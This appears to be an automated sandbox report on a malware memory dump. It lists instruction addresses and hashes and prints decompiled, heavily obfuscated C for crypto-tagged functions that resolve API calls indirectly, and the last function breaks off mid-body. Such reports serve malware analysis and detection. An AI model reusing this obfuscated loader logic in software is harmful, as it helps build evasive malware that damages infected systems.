0x033356a6
0x033356a8
0x033356ac
0x033356af
0x033356b8
0x033356bb
0x033356c2
0x033356c6
0x033356c9
0x033356cf
0x033356d6
0x033356dc
0x033356e1
0x033356e4
0x033356e8
0x033356eb
0x033356ee
0x033356f4
0x033356fe
0x03335701
0x03335707
0x0333570f
0x03335716
0x0333571f
0x03335725
0x0333572f
0x03335732
0x03335738
0x03335742
0x03335745
0x0333574b
0x03335753
0x0333575a
0x03335760
0x0333576c
0x0333576f
0x03335777
0x0333577b
0x0333577e
0x03335781
0x0333578a
0x0333578d
0x03335794
0x03335797
0x0333579a
0x033357a0
0x033357a7
0x033357ad
0x00000000
0x033357ad
0x03335dbb
0x03335dbe
0x03335dd0
0x03335dd0
0x03335441

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86a651931a01c3be3bd58236517675960697cf91adc10e4db860c8d0544b250d
Instruction ID: 7cb0bbbc68eef94fb4f7ae81d3cd7ea27f45901a25f29398aa98a37ba9371bad
Opcode Fuzzy Hash: 86a651931a01c3be3bd58236517675960697cf91adc10e4db860c8d0544b250d
Instruction Fuzzy Hash: 8E723372844219DFEF04DFA0C9897EEBBF1FF08311F19486ED889AA145D7341664CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 033331B3, Relevance: .6, Instructions: 646
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E033331B3(signed int __ebx, signed int __edx, signed int __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t312;
				void* _t314;
				signed int _t315;
				signed int _t318;
				signed int _t321;
				void* _t323;
				void* _t327;
				void* _t331;
				void* _t333;
				void* _t334;
				signed int _t335;
				signed int _t337;
				void* _t339;
				void* _t340;
				signed int _t345;
				signed int _t348;
				void* _t350;
				void* _t351;
				signed int _t355;
				void* _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t361;
				signed int _t365;
				signed int _t371;
				signed int _t373;
				void* _t378;
				void* _t380;
				signed int _t383;
				signed int _t386;
				intOrPtr _t390;
				signed int _t396;
				signed int _t398;
				signed int _t402;
				signed int _t405;
				void* _t408;
				void* _t410;
				signed int _t416;
				intOrPtr _t421;
				signed int _t426;
				intOrPtr _t429;
				intOrPtr _t434;
				signed int _t437;
				void* _t442;
				void* _t444;
				signed int _t446;
				signed int _t448;
				signed int _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int _t463;
				signed int _t465;
				signed int _t468;
				signed int _t473;
				signed int _t480;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t500;
				signed int _t502;
				signed int _t505;
				signed int _t507;
				signed int _t510;
				void* _t514;
				signed int _t516;
				signed int _t519;
				signed int _t522;
				signed int _t525;
				signed int _t531;
				signed int _t534;
				signed int _t537;
				signed int _t540;
				void* _t541;
				signed int _t543;
				signed int _t546;
				void* _t553;
				signed int _t555;
				signed int _t557;
				signed int _t560;
				signed int _t563;
				signed int _t566;
				void* _t570;
				signed int _t573;
				void* _t574;
				signed int _t576;
				signed int _t579;
				signed int* _t580;
				signed int* _t581;
				signed int* _t582;
				signed int* _t583;
				signed int* _t584;
				signed int* _t585;
				signed int* _t586;
				signed int* _t587;
				signed int* _t588;
				signed int* _t589;
				signed int* _t590;
				signed int* _t591;
				signed int* _t592;
				signed int* _t593;
				signed int* _t594;
				signed int* _t596;

				_t531 = __edi;
				_t500 = __edx;
				_t437 = __ebx;
				_t1 = _t437 + 0x41c972; // 0x41c972
				_push(_v16);
				 *_t580 = _t1;
				_t312 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_t573);
				 *_t580 =  *_t580 - _t573;
				 *_t580 = _t312;
				_t4 = _t437 + 0x41c726; // 0x41c726
				_v12 = 0;
				_push(_v12);
				 *_t580 =  *_t580 | _t4;
				_t314 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t446 =  *_t580;
				_t581 =  &(_t580[1]);
				 *_t581 =  *_t581 + __esi;
				_t553 = _t314;
				_t315 = _t553 + _t446;
				_t555 = 0;
				_v16 = _t315;
				_t448 = _t446 & 0x00000000 | _t315 & 0x00000000 |  *(__ebx + 0x41c68d);
				_t318 = _v16;
				if(_t448 > _t318) {
					_t11 = _t437 + 0x41c972; // 0x41c972
					_v16 = 0;
					_push(_v16);
					 *_t581 =  *_t581 | _t11;
					_t14 = _t437 + 0x41c726; // 0x41c726
					_push(_t573);
					 *_t581 =  *_t581 - _t573;
					 *_t581 =  *_t581 ^ _t14;
					_t318 =  *((intOrPtr*)(__ebx + 0x41f064))();
				}
				_v12 = _t531;
				 *(_t437 + 0x41c3b5) =  *(_t437 + 0x41c3b5) & 0x00000000;
				 *(_t437 + 0x41c3b5) =  *(_t437 + 0x41c3b5) | _t531 & 0x00000000 ^ _t318;
				_t534 = _v12;
				_t22 = _t437 + 0x41d2f2; // 0x41d2f2
				 *_t581 =  *_t581 & 0x00000000;
				 *_t581 =  *_t581 + _t22;
				_t23 = _t437 + 0x41d08b; // 0x41d08b
				_v12 = _v12 & 0x00000000;
				 *_t581 =  *_t581 | _t23;
				_t321 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _t500);
				 *_t581 =  *_t581 & 0x00000000;
				 *_t581 =  *_t581 | _t321;
				_t28 = _t437 + 0x41c1f0; // 0x41c1f0
				 *_t581 =  *_t581 & 0x00000000;
				 *_t581 =  *_t581 | _t28;
				_t323 =  *((intOrPtr*)(_t437 + 0x41f060))(_t555);
				 *_t30 = _t448;
				 *_t581 =  *_t581 | _t573;
				_t574 = _t323;
				_t576 = 0;
				 *_t581 = _t574 + _v8;
				_t450 =  *(_t437 + 0x41c529);
				_t327 = 0;
				if(_t450 > _t327) {
					_t33 = _t437 + 0x41d08b; // 0x41d08b
					 *_t581 =  *_t581 ^ _t500;
					 *_t581 =  *_t581 ^ _t33;
					_t34 = _t437 + 0x41c1f0; // 0x41c1f0
					_v16 = 0;
					 *_t581 =  *_t581 | _t34;
					_t434 =  *((intOrPtr*)(_t437 + 0x41f064))(_v16, _t500);
					_v16 = _t450;
					 *((intOrPtr*)(_t437 + 0x41cd05)) = _t434;
					_t450 = _v16;
				}
				_t582 = _t581 - 0xfffffffc;
				 *_t582 =  *_t582 ^ _t576;
				 *_t582 =  *_t582 +  *_t581;
				_t41 = _t437 + 0x41d1b0; // 0x41d1b0
				 *_t582 =  *_t582 & 0x00000000;
				 *_t582 =  *_t582 + _t41;
				_t331 =  *((intOrPtr*)(_t437 + 0x41f060))(_t576, _t576);
				 *_t582 =  *_t582 & 0x00000000;
				 *_t582 =  *_t582 + _t331;
				_t43 = _t437 + 0x41c2f3; // 0x41c2f3
				 *_t582 =  *_t582 ^ _t555;
				 *_t582 =  *_t582 ^ _t43;
				_t333 =  *((intOrPtr*)(_t437 + 0x41f060))(_t555, _t500);
				_t452 = _t450 & 0x00000000 ^  *_t582;
				_t583 =  &(_t582[1]);
				 *_t45 = _t333;
				_v8 = _v8 + _t452;
				_push(_v8);
				_pop(_t334);
				_t502 = _t500;
				_v16 = _t502;
				_t454 = _t452 & 0x00000000 | _t502 & 0x00000000 |  *(_t437 + 0x41c51d);
				_t505 = _v16;
				if(_t454 > _t334) {
					_t52 = _t437 + 0x41d1b0; // 0x41d1b0
					 *_t583 =  *_t583 & 0x00000000;
					 *_t583 =  *_t583 ^ _t52;
					_t53 = _t437 + 0x41c2f3; // 0x41c2f3
					 *_t583 =  *_t583 - _t454;
					 *_t583 = _t53;
					_t334 =  *((intOrPtr*)(_t437 + 0x41f064))(_t454, _t505);
				}
				 *_t55 = _t334;
				_push(_v16);
				_pop( *_t57);
				_t335 =  *((intOrPtr*)(_t437 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t583 =  *_t583 ^ _t335;
				_t62 = _t437 + 0x41c0f2; // 0x41c0f2
				 *_t583 =  *_t583 - _t505;
				 *_t583 = _t62;
				_t337 =  *((intOrPtr*)(_t437 + 0x41f060))(_t505, _v16);
				 *_t583 = _t337;
				_t65 = _t437 + 0x41cfb1; // 0x41cfb1
				 *_t583 = _t65;
				_t339 =  *((intOrPtr*)(_t437 + 0x41f060))(_v8, _v16);
				_t584 = _t583 - 0xfffffffc;
				 *_t68 = _t339;
				_v16 = _v16 + (_t454 & 0x00000000 |  *_t583);
				_push(_v16);
				_pop(_t340);
				_t557 = _t555;
				_v8 = _t557;
				_t457 = 0 ^  *(_t437 + 0x41cba2);
				_t560 = _v8;
				if(_t457 > _t340) {
					_t75 = _t437 + 0x41c0f2; // 0x41c0f2
					_v16 = _v16 & 0x00000000;
					 *_t584 =  *_t584 ^ _t75;
					_t79 = _t437 + 0x41cfb1; // 0x41cfb1
					_v8 = _v8 & 0x00000000;
					 *_t584 =  *_t584 ^ _t79;
					_t429 =  *((intOrPtr*)(_t437 + 0x41f064))(_v8, _v16);
					_v8 = _t505;
					 *((intOrPtr*)(_t437 + 0x41cbd5)) = _t429;
					_t505 = _v8;
				}
				_pop( *_t87);
				 *_t584 =  *_t584 - _t534;
				 *_t584 =  *_t584 ^ 0 ^ _v8;
				_t89 = _t437 + 0x41cdc3; // 0x41cdc3
				_v8 = 0;
				 *_t584 =  *_t584 + _t89;
				_t92 = _t437 + 0x41c7d0; // 0x41c7d0
				_v16 = 0;
				 *_t584 =  *_t584 | _t92;
				_t345 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _v8, _t534);
				_v12 = _t457;
				 *(_t437 + 0x41cb83) =  *(_t437 + 0x41cb83) & 0x00000000;
				 *(_t437 + 0x41cb83) =  *(_t437 + 0x41cb83) ^ (_t457 - _v12 | _t345);
				_t103 = _t437 + 0x41d16f; // 0x41d16f
				_v16 = _v16 & 0x00000000;
				 *_t584 =  *_t584 ^ _t103;
				_t107 = _t437 + 0x41cd88; // 0x41cd88
				 *_t584 =  *_t584 & 0x00000000;
				 *_t584 =  *_t584 ^ _t107;
				_t348 =  *((intOrPtr*)(_t437 + 0x41f060))(_t505, _v16);
				_v16 = _v16 & 0x00000000;
				 *_t584 =  *_t584 ^ _t348;
				_t112 = _t437 + 0x41d272; // 0x41d272
				 *_t584 =  *_t584 & 0x00000000;
				 *_t584 =  *_t584 ^ _t112;
				_t350 =  *((intOrPtr*)(_t437 + 0x41f060))(_t437, _v16);
				_t585 = _t584 - 0xfffffffc;
				 *_t114 = _t350;
				_v16 = _v16 + (_v12 & 0x00000000) +  *_t584;
				_push(_v16);
				_pop(_t351);
				_t507 = _t505;
				 *_t585 = _t507;
				_t463 =  *(_t437 + 0x41c389);
				_t510 = 0;
				if(_t463 > _t351) {
					_t119 = _t437 + 0x41cd88; // 0x41cd88
					 *_t585 =  *_t585 & 0x00000000;
					 *_t585 =  *_t585 ^ _t119;
					_t120 = _t437 + 0x41d272; // 0x41d272
					 *_t585 =  *_t585 & 0x00000000;
					 *_t585 =  *_t585 ^ _t120;
					_t426 =  *((intOrPtr*)(_t437 + 0x41f064))(_t560, _t463);
					 *(_t437 + 0x41cc5a) =  *(_t437 + 0x41cc5a) & 0x00000000;
					 *(_t437 + 0x41cc5a) =  *(_t437 + 0x41cc5a) | _t463 & 0x00000000 | _t426;
					_t463 = _t463;
				}
				_t586 = _t585 - 0xfffffffc;
				 *_t586 = 0 ^  *_t585;
				_t127 = _t437 + 0x41cb2c; // 0x41cb2c
				 *_t586 =  *_t586 ^ _t437;
				 *_t586 =  *_t586 | _t127;
				_t355 =  *((intOrPtr*)(_t437 + 0x41f060))(_t437, _v16);
				_v8 = 0;
				 *_t586 =  *_t586 ^ _t355;
				_t131 = _t437 + 0x41ca15; // 0x41ca15
				_v12 = _v12 & 0x00000000;
				 *_t586 =  *_t586 | _t131;
				_t357 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v8);
				_t465 =  *_t586;
				_t587 = _t586 - 0xfffffffc;
				_v8 = _t534;
				_push(_t465 + _t357);
				_t537 = _v8;
				_pop(_t358);
				_t540 = _t537;
				if((_t465 & 0x00000000 | _t537 & 0x00000000 ^  *(_t437 + 0x41c82d)) > _t358) {
					_t139 = _t437 + 0x41cb2c; // 0x41cb2c
					_v16 = _v16 & 0x00000000;
					 *_t587 =  *_t587 + _t139;
					_t143 = _t437 + 0x41ca15; // 0x41ca15
					 *_t587 =  *_t587 & 0x00000000;
					 *_t587 =  *_t587 + _t143;
					_t358 =  *((intOrPtr*)(_t437 + 0x41f064))(_t560, _v16);
				}
				_v12 = _t560;
				 *((intOrPtr*)(_t437 + 0x41c92d)) = _t358;
				_t563 = _v12;
				_t359 =  *((intOrPtr*)(_t437 + 0x41f060))();
				 *_t587 =  *_t587 & 0x00000000;
				 *_t587 =  *_t587 | _t359;
				_t149 = _t437 + 0x41c69d; // 0x41c69d
				_v16 = 0;
				 *_t587 =  *_t587 | _t149;
				_t361 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _t563);
				_v12 = _t510;
				 *(_t437 + 0x41ccdd) =  *(_t437 + 0x41ccdd) & 0x00000000;
				 *(_t437 + 0x41ccdd) =  *(_t437 + 0x41ccdd) | _t510 - _v12 | _t361;
				_t588 =  &(_t587[1]);
				_pop( *_t160);
				_t468 = _v16;
				 *_t588 = (_t361 & 0x00000000) +  *_t587;
				 *_t588 = _t468;
				_t164 = _t437 + 0x41c2d3; // 0x41c2d3
				_v16 = _v16 & 0x00000000;
				 *_t588 =  *_t588 | _t164;
				_t365 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _v12, _v8);
				_v12 = _t468;
				 *(_t437 + 0x41d1f2) = _t365;
				_pop( *_t172);
				_t473 = _v12 & 0x00000000 | _v8;
				_pop( *_t174);
				 *_t588 = _v12;
				_push(_t365 & 0x00000000 ^ _v16);
				_pop(_t514);
				_t516 = 0;
				_v8 = 0;
				 *_t588 =  *_t588 | _t514 + _t473;
				_t178 = _t437 + 0x41d35c; // 0x41d35c
				 *_t588 = _t178;
				_t180 = _t437 + 0x41cffa; // 0x41cffa
				 *_t588 =  *_t588 ^ _t576;
				 *_t588 = _t180;
				_t371 =  *((intOrPtr*)(_t437 + 0x41f068))(_t576, _v12, _v8);
				_v12 = _t516;
				 *(_t437 + 0x41c7e6) =  *(_t437 + 0x41c7e6) & 0x00000000;
				 *(_t437 + 0x41c7e6) =  *(_t437 + 0x41c7e6) | _t516 - _v12 | _t371;
				_t519 = _v12;
				_t373 = 0 ^  *_t588;
				_t589 =  &(_t588[1]);
				_v8 = _t373;
				_v12 = 0;
				 *_t589 =  *_t589 + _v8;
				 *_t589 = _t473 & 0x00000000 ^ (_t373 - _v8 |  *(_t437 + 0x41d1e6));
				_t196 = _t437 + 0x41c887; // 0x41c887
				 *_t589 = _t196;
				_t378 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v8, _v12);
				_v12 = _v12 & 0x00000000;
				 *_t589 =  *_t589 + _t378;
				_t202 = _t437 + 0x41c411; // 0x41c411
				_v16 = 0;
				 *_t589 =  *_t589 + _t202;
				_t380 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _v12);
				_t590 = _t589 - 0xfffffffc;
				 *_t590 =  *_t590 ^ _t540;
				_t541 = _t380;
				_t543 = 0;
				_v12 = _t563;
				_t566 = _v12;
				if((0 ^  *(_t437 + 0x41c39d)) > _t541 +  *_t589) {
					_t209 = _t437 + 0x41c887; // 0x41c887
					 *_t590 =  *_t590 & 0x00000000;
					 *_t590 =  *_t590 | _t209;
					_t210 = _t437 + 0x41c411; // 0x41c411
					_v12 = _v12 & 0x00000000;
					 *_t590 =  *_t590 | _t210;
					_t421 =  *((intOrPtr*)(_t437 + 0x41f064))(_v12, _t576);
					 *_t590 = _t543;
					 *((intOrPtr*)(_t437 + 0x41c9b5)) = _t421;
					_t543 = 0;
				}
				_t480 = 0 ^  *_t590;
				_t591 =  &(_t590[1]);
				_t383 =  *_t591;
				_t592 =  &(_t591[1]);
				if(_t480 > _t383) {
					_t216 = _t437 + 0x41d2f2; // 0x41d2f2
					_v16 = _v16 & 0x00000000;
					 *_t592 =  *_t592 ^ _t216;
					_t220 = _t437 + 0x41d16f; // 0x41d16f
					_v16 = 0;
					 *_t592 =  *_t592 ^ _t220;
					_t383 =  *((intOrPtr*)(_t437 + 0x41f064))(_v16, _v16);
				}
				 *_t592 = _t576;
				 *(_t437 + 0x41c0d6) = 0 ^ _t383;
				_t579 = 0;
				_v12 = _v12 & 0x00000000;
				 *_t592 =  *_t592 | _t566;
				_t228 = _t437 + 0x41cd35; // 0x41cd35
				 *_t592 =  *_t592 ^ _t480;
				 *_t592 =  *_t592 + _t228;
				_t229 = _t437 + 0x41ca62; // 0x41ca62
				_v16 = 0;
				 *_t592 =  *_t592 + _t229;
				_t386 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _t480, _v12);
				_v16 = _t543;
				 *(_t437 + 0x41cb3a) =  *(_t437 + 0x41cb3a) & 0x00000000;
				 *(_t437 + 0x41cb3a) =  *(_t437 + 0x41cb3a) ^ (_t543 - _v16 | _t386);
				_t546 = _v16;
				_t483 = _t480;
				_v12 = 0;
				 *_t592 =  *_t592 | _t386 & 0x00000000 ^ (_t480 & 0x00000000 | _a4);
				_t243 = _t437 + 0x41c84c; // 0x41c84c
				_v12 = _v12 & 0x00000000;
				 *_t592 =  *_t592 | _t243;
				_t390 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v12);
				_v16 = _t519;
				 *((intOrPtr*)(_t437 + 0x41d2c7)) = _t390;
				_t522 = _v16;
				_t593 = _t592 - 0xfffffffc;
				 *_t593 =  *_t593 - _t437;
				 *_t593 =  *_t592 - 1;
				_t251 = _t437 + 0x41ceef; // 0x41ceef
				_v16 = 0;
				 *_t593 =  *_t593 | _t251;
				_t254 = _t437 + 0x41c9c8; // 0x41c9c8
				 *_t593 =  *_t593 - _t522;
				 *_t593 = _t254;
				_t396 =  *((intOrPtr*)(_t437 + 0x41f068))(_t522, _v16, _t437);
				_v16 = _t522;
				 *(_t437 + 0x41d00d) =  *(_t437 + 0x41d00d) & 0x00000000;
				 *(_t437 + 0x41d00d) =  *(_t437 + 0x41d00d) | _t522 ^ _v16 | _t396;
				_t525 = _v16;
				_t398 =  *_t593;
				_t594 = _t593 - 0xfffffffc;
				if(_t398 > 0) {
					if(_a12 != 0) {
						_t402 = _t398;
						 *_t301 = _t483 & 0x00000000 | _t398 ^  *_t594 ^ _a12;
						_v12 = _v12 + _t402;
						_push(_v12);
						_pop(_t486);
						_t570 = _t566;
						 *_t594 =  *_t594 ^ _t486;
						_t487 = _t437;
						_t488 = _t487 & _a8;
						 *_t306 = _t570;
						_v8 = _v8 + _t488;
						_push(_v8);
						_pop(_t566);
						_t437 = _t437;
						 *_t594 =  *_t594 & 0x00000000;
						 *_t594 =  *_t594 + _t566;
						 *_t594 =  *_t594 ^ _t579;
						 *_t594 =  *_t594 ^ _t488;
						 *_t594 = _t402;
						_t398 = E033331B3(_t437, _t525, _t546, _t566, _v16, _t579, _t488);
					}
					_push(_t437);
					return _t398 ^ _t398;
				} else {
					 *_t594 =  *_t594 & 0x00000000;
					 *_t594 =  *_t594 | _t398;
					_t263 = _t437 + 0x41cfc3; // 0x41cfc3
					_v16 = _v16 & 0x00000000;
					 *_t594 =  *_t594 ^ _t263;
					_t267 = _t437 + 0x41c769; // 0x41c769
					 *_t594 =  *_t594 & 0x00000000;
					 *_t594 =  *_t594 ^ _t267;
					_t405 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _t483);
					_v16 = _t483;
					 *(_t437 + 0x41d0ea) =  *(_t437 + 0x41d0ea) & 0x00000000;
					 *(_t437 + 0x41d0ea) =  *(_t437 + 0x41d0ea) ^ (_t483 & 0x00000000 | _t405);
					 *_t275 = _t525;
					_t596 = _t594 - 0xfffffffc;
					 *_t596 =  *_t596 - _t437;
					 *_t596 =  *_t596 | _v16;
					_t277 = _t437 + 0x41cd95; // 0x41cd95
					 *_t596 =  *_t596 ^ _t525;
					 *_t596 = _t277;
					_t408 =  *((intOrPtr*)(_t437 + 0x41f060))(_t525, _t437);
					 *_t596 =  *_t596 & 0x00000000;
					 *_t596 =  *_t596 + _t408;
					_t279 = _t437 + 0x41cbf8; // 0x41cbf8
					 *_t596 = _t279;
					_t410 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v16);
					_pop( *_t282);
					 *_t596 = _t437;
					_t442 = _t410;
					_t444 = 0;
					_push(_t546);
					if((0 + _v12 & 0x00000000 ^ (_t546 ^  *_t596 |  *(_t444 + 0x41c691))) > _t442 + 0 + _v12) {
						_t285 = _t444 + 0x41cd95; // 0x41cd95
						 *_t596 = _t285;
						_t287 = _t444 + 0x41cbf8; // 0x41cbf8
						_v12 = _v12 & 0x00000000;
						 *_t596 =  *_t596 | _t287;
						_t416 =  *((intOrPtr*)(_t444 + 0x41f064))(_v12, _v16);
						_v8 = _t525;
						 *(_t444 + 0x41d309) =  *(_t444 + 0x41d309) & 0x00000000;
						 *(_t444 + 0x41d309) =  *(_t444 + 0x41d309) | _t525 ^ _v8 | _t416;
					}
					return  *_t596;
				}
			}

0x033331b3
0x033331b3
0x033331b3
0x033331b9
0x033331bf
0x033331c2
0x033331c5
0x033331cb
0x033331cc
0x033331cf
0x033331d2
0x033331d8
0x033331df
0x033331e2
0x033331e5
0x033331ed
0x033331f0
0x033331f5
0x033331f9
0x033331fc
0x033331fe
0x033331ff
0x0333320e
0x03333210
0x03333215
0x03333217
0x0333321d
0x03333224
0x03333227
0x0333322a
0x03333230
0x03333231
0x03333234
0x03333237
0x03333237
0x0333323d
0x03333245
0x0333324c
0x03333252
0x03333255
0x0333325c
0x03333260
0x03333263
0x03333269
0x03333270
0x03333273
0x0333327a
0x0333327e
0x03333281
0x03333288
0x0333328c
0x0333328f
0x03333295
0x0333329d
0x033332a1
0x033332a6
0x033332a9
0x033332b4
0x033332b6
0x033332b9
0x033332bb
0x033332c2
0x033332c5
0x033332c8
0x033332ce
0x033332d8
0x033332db
0x033332e1
0x033332e8
0x033332ee
0x033332ee
0x033332f6
0x033332fa
0x033332fd
0x03333300
0x03333307
0x0333330b
0x0333330e
0x03333315
0x03333319
0x0333331c
0x03333323
0x03333326
0x03333329
0x03333335
0x03333338
0x0333333f
0x03333342
0x03333345
0x03333348
0x03333349
0x0333334a
0x03333359
0x0333335b
0x03333360
0x03333362
0x03333369
0x0333336d
0x03333370
0x03333377
0x0333337a
0x0333337d
0x0333337d
0x03333384
0x03333387
0x0333338a
0x03333390
0x03333396
0x0333339d
0x033333a0
0x033333a7
0x033333aa
0x033333ad
0x033333b6
0x033333b9
0x033333c2
0x033333c5
0x033333d4
0x033333db
0x033333de
0x033333e1
0x033333e4
0x033333e5
0x033333e6
0x033333f1
0x033333f3
0x033333f8
0x033333fa
0x03333400
0x03333407
0x0333340a
0x03333410
0x03333417
0x0333341a
0x03333420
0x03333427
0x0333342d
0x0333342d
0x03333432
0x03333439
0x0333343c
0x0333343f
0x03333445
0x0333344f
0x03333452
0x03333458
0x03333462
0x03333465
0x0333346b
0x03333473
0x0333347a
0x03333483
0x03333489
0x03333490
0x03333493
0x0333349a
0x0333349e
0x033334a1
0x033334a7
0x033334ae
0x033334b1
0x033334b8
0x033334bc
0x033334bf
0x033334ce
0x033334d5
0x033334d8
0x033334db
0x033334de
0x033334df
0x033334e2
0x033334ed
0x033334ef
0x033334f2
0x033334f4
0x033334fb
0x033334ff
0x03333502
0x03333509
0x0333350d
0x03333510
0x0333351c
0x03333523
0x03333529
0x03333529
0x0333352f
0x03333535
0x03333538
0x0333353f
0x03333542
0x03333545
0x0333354b
0x03333555
0x03333558
0x0333355e
0x03333565
0x03333568
0x03333574
0x03333577
0x0333357a
0x03333581
0x03333582
0x03333585
0x03333595
0x03333598
0x0333359a
0x033335a0
0x033335a7
0x033335aa
0x033335b1
0x033335b5
0x033335b8
0x033335b8
0x033335be
0x033335c5
0x033335cb
0x033335ce
0x033335d5
0x033335d9
0x033335dc
0x033335e2
0x033335ec
0x033335ef
0x033335f5
0x033335fd
0x03333604
0x03333616
0x03333619
0x0333361c
0x03333622
0x03333628
0x0333362b
0x03333631
0x03333638
0x0333363b
0x03333641
0x03333648
0x03333657
0x0333365a
0x03333663
0x0333366b
0x0333366e
0x0333366f
0x03333674
0x03333675
0x0333367f
0x03333682
0x0333368b
0x0333368e
0x03333695
0x03333698
0x0333369b
0x033336a1
0x033336a9
0x033336b0
0x033336b6
0x033336bb
0x033336be
0x033336c1
0x033336d5
0x033336df
0x033336e5
0x033336e8
0x033336f1
0x033336f4
0x033336fa
0x03333701
0x03333704
0x0333370a
0x03333714
0x03333717
0x03333722
0x03333727
0x0333372b
0x03333730
0x03333731
0x0333373e
0x03333743
0x03333745
0x0333374c
0x03333750
0x03333753
0x03333759
0x03333760
0x03333763
0x0333376b
0x03333772
0x03333778
0x03333778
0x0333377b
0x0333377e
0x03333783
0x03333786
0x0333378b
0x0333378d
0x03333793
0x0333379a
0x0333379d
0x033337a3
0x033337ad
0x033337b0
0x033337b0
0x033337b8
0x033337bf
0x033337c5
0x033337c6
0x033337cd
0x033337d0
0x033337d7
0x033337da
0x033337dd
0x033337e3
0x033337ed
0x033337f0
0x033337f6
0x033337fe
0x03333805
0x0333380b
0x0333381a
0x0333381b
0x03333825
0x03333828
0x0333382e
0x03333835
0x03333838
0x0333383e
0x03333845
0x0333384b
0x03333853
0x03333858
0x0333385b
0x0333385e
0x03333864
0x0333386e
0x03333871
0x03333878
0x0333387b
0x0333387e
0x03333884
0x0333388c
0x03333893
0x03333899
0x033338a2
0x033338a5
0x033338ab
0x033339ad
0x033339bb
0x033339c0
0x033339c3
0x033339c6
0x033339c9
0x033339ca
0x033339cc
0x033339cf
0x033339d0
0x033339d7
0x033339da
0x033339dd
0x033339e0
0x033339e1
0x033339e3
0x033339e7
0x033339eb
0x033339ee
0x033339f4
0x033339f7
0x033339f7
0x033339fc
0x03333a11
0x033338b1
0x033338b2
0x033338b6
0x033338b9
0x033338bf
0x033338c6
0x033338c9
0x033338d0
0x033338d4
0x033338d7
0x033338dd
0x033338e5
0x033338ec
0x033338f5
0x03333904
0x03333908
0x0333390b
0x0333390e
0x03333915
0x03333918
0x0333391b
0x03333922
0x03333926
0x03333929
0x03333932
0x03333935
0x0333393d
0x03333945
0x03333949
0x0333394e
0x0333394f
0x03333961
0x03333963
0x0333396c
0x0333396f
0x03333975
0x0333397c
0x0333397f
0x03333985
0x0333398d
0x03333994
0x0333399a
0x033339a6
0x033339a6

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41702c0559bb7f5a073f0754972d7e78843a10d494ddda559bbe32eb0d58a14d
Instruction ID: dd97a763d397c4d22569d14e2803dd012e4000c7c9df971698cff4f12a8c397f
Opcode Fuzzy Hash: 41702c0559bb7f5a073f0754972d7e78843a10d494ddda559bbe32eb0d58a14d
Instruction Fuzzy Hash: 47520372944608EFEB04DFA4C88A7ADBBF1FF08320F1585AED886EA145D7345664CF19

Uniqueness

Uniqueness Score: -1.00%

Function 03333FAB, Relevance: .6, Instructions: 566
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E03333FAB(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t346;
				signed int _t351;
				signed int _t352;
				signed int _t355;
				void* _t359;
				void* _t361;
				signed int _t362;
				signed int _t367;
				void* _t369;
				void* _t370;
				signed int _t374;
				signed int _t377;
				signed int _t380;
				signed int _t385;
				void* _t387;
				void* _t389;
				intOrPtr _t390;
				void _t393;
				signed int _t397;
				intOrPtr _t403;
				signed int _t408;
				signed int _t410;
				signed int _t415;
				signed int _t418;
				void* _t420;
				signed int _t421;
				void* _t424;
				signed int _t429;
				signed int _t430;
				signed int _t433;
				void* _t437;
				void* _t439;
				signed int _t440;
				signed int _t443;
				intOrPtr _t445;
				signed int _t451;
				signed int _t454;
				signed int _t457;
				signed int _t459;
				signed int _t471;
				signed int _t473;
				signed int _t475;
				signed int _t478;
				void* _t481;
				signed int _t488;
				signed int _t489;
				signed int _t498;
				signed int _t500;
				signed int _t502;
				signed int _t504;
				signed int _t510;
				signed int _t513;
				void* _t514;
				signed int _t516;
				signed int _t519;
				signed int _t520;
				signed int _t525;
				signed int _t528;
				signed int _t530;
				signed int _t532;
				signed int _t534;
				signed int _t537;
				signed int _t540;
				signed int _t544;
				signed int _t548;
				signed int _t553;
				signed int _t559;
				signed int _t562;
				signed int _t565;
				void* _t570;
				void* _t577;
				signed int _t579;
				signed int _t582;
				signed int _t585;
				signed int _t590;
				void* _t591;
				signed int _t595;
				signed int _t598;
				signed int _t601;
				signed int _t604;
				signed int* _t608;
				signed int* _t609;
				signed int* _t610;
				signed int* _t611;
				signed int* _t612;
				signed int* _t613;
				signed int* _t614;
				signed int* _t615;
				signed int* _t616;
				signed int* _t617;
				signed int* _t621;
				signed int* _t622;
				signed int* _t623;

				_t585 = __esi;
				_t454 = __ebx;
				 *(_t598 - 0x1c) =  *(_t598 - 0x1c) & 0x00000000;
				_push( *(_t598 - 0x1c));
				 *_t608 =  *_t608 + __ebx + 0x41c4c0;
				_push( *((intOrPtr*)(__ebx + 0x41f060))());
				_pop( *_t6);
				_push( *(_t598 - 0x20));
				_pop( *_t8);
				_push(__ebx);
				 *_t608 =  *_t608 & 0x00000000;
				 *_t608 =  *_t608 | __ebx + 0x0041cf44;
				_push( *(_t598 - 0x1c));
				 *_t608 = __ebx + 0x41d05b;
				_t346 =  *((intOrPtr*)(__ebx + 0x41f060))();
